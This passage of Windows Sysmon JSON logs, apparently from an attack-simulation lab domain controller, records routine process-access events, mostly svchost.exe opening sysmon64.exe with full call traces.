C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-001066040400}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 